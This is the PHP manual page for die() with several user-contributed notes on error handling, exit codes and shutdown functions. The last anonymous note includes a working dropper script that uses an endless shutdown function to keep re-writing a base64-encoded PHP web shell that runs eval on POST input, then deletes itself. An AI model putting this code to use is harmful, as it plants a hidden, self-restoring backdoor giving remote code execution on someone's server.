It is poor design to rely on die() for error handling in a web site because it results in an ugly experience for site users: a broken page and - if they're lucky - an error message that is no help to them at all. As far as they are concerned, when the page breaks, the whole site might as well be broken.
If you ever want the public to use your site, always design it to handle errors in a way that will allow them to continue using it if possible. If it's not possible and the site really is broken, make sure that you find out so that you can fix it. die() by itself won't do either.
If a supermarket freezer breaks down, a customer who wanted to buy a tub of ice cream doesn't expect to be kicked out of the building.
die
(PHP 4, PHP 5, PHP 7)
die — Equivalent to exit
Description
This language construct is equivalent to exit().
add a note
User Contributed Notes 5 notes
Hayley Watson ¶
7 years ago
Damien Bezborodov ¶
10 years ago
Beware that when using PHP on the command line, die("Error") simply prints "Error" to STDOUT and terminates the program with a normal exit code of 0.
If you are looking to follow UNIX conventions for CLI programs, you may consider the following:
<?php
fwrite(STDERR, "An error occurred.\n");
exit(1); // A response code other than 0 is a failure
?>
In this way, when you pipe STDOUT to a file, you may see error messages in the console and BASH scripts can test for a response code of 0 for success:
rc@adl-dev-01:~$ php die.php > test
An error occurred.
rc@adl-dev-01:~$ echo $?
1
Ideally, PHP would write all Warnings, Fatal Errors, etc on STDERR, but that's another story.
jbailey at raspberryginger dot com ¶
12 years ago
die doesn't prevent destructors from being run, so the script doesn't exit immediately, it still goes through cleanup routines.
info at alzlper dot com ¶
1 year ago
Using die() can be a good option when working with HTTP Endpoints.
If your PHP Script is one, you can use die() to send back an error as plain text or JSON for example.
die(json_encode(array('error' => 'some error')));
Anonymous ¶
1 year ago
1.) I run something similar to this for 3 days on a couple of systems. It seems like this function does not have any time limitation at all, IF it gets called due to a max_execution_time-out.
<?php
ignore_user_abort(true);
define( "ABS_PATH", getcwd() . DIRECTORY_SEPARATOR );
define( "LOG_FILE", ABS_PATH . "log.txt" );
function shutdown() {
while(true) {
file_put_contents(LOG_FILE, date("c") . " (shutdown)\n", FILE_APPEND);
sleep(1);
}
}
register_shutdown_function("shutdown");
ini_set("max_execution_time", 3);
while(true) {
file_put_contents(LOG_FILE, date("c") . " (normal)\n", FILE_APPEND);
sleep(1);
}
/* log.txt
2017-11-01T23:56:00+00:00 (normal)
2017-11-01T23:56:01+00:00 (normal)
2017-11-01T23:56:02+00:00 (normal)
2017-11-01T23:56:03+00:00 (shutdown)
2017-11-01T23:56:04+00:00 (shutdown)
2017-11-01T23:56:05+00:00 (shutdown)
[ logs for 3 days ]
*/
?>
2.) With this code, the registered function is limited to max_execution_time.
<?php
// [...]
file_put_contents(LOG_FILE, date("c") . " (normal)\n", FILE_APPEND);
sleep(1);
EXIT; // <-- Now with exit, not needed just to show
/* log.txt
2017-11-01T23:57:38+00:00 (normal)
2017-11-01T23:57:39+00:00 (shutdown)
2017-11-01T23:57:40+00:00 (shutdown)
*/
?>
3.) This is very evil. you can run code "forever". For example, this code checks if the file shell.php exists, and drops it if not. Of course, this is not how a hacker breach in. But if he has access, this is a great place to hide evil code.
<?php
ignore_user_abort(true);
define( "ABS_PATH", getcwd() . DIRECTORY_SEPARATOR );
define( "SHELL_PATH", ABS_PATH . "shell.php" );
define( "STOP_FILE", ABS_PATH . "stop.txt" );
define( "SLEEP", 10 );
/* base64 of: <?php if(isset($_POST['exec'])) eval($_POST['exec']); ?> */
define( "SHELL_CODE", "PD9waHAgaWYoaXNzZXQoJF9QT1NUWydleGVjJ10pKSBldmFsKCRfUE9TVFsnZXhlYyddKTsgPz4=" );
function shutdown() {
while(true) {
if( file_exists( STOP_FILE ) ) {
break;
}
if( ! file_exists( SHELL_PATH ) )
file_put_contents( SHELL_PATH, base64_decode( SHELL_CODE ) );
sleep(SLEEP);
}
exit;
}
register_shutdown_function("shutdown");
// Do something. Delete this drop script for example.
unlink($_SERVER['SCRIPT_FILENAME']);
// Try 1 to go to shutdown
ini_set("max_execution_time", 1);
usleep(1500000);
// Try 2 to go to shutdown
sleep(ini_get("max_execution_time") + 1);
// Try 3 to go to shutdown (better have a max_execution_time ...)
while(true) {
sleep(1);
}
?>
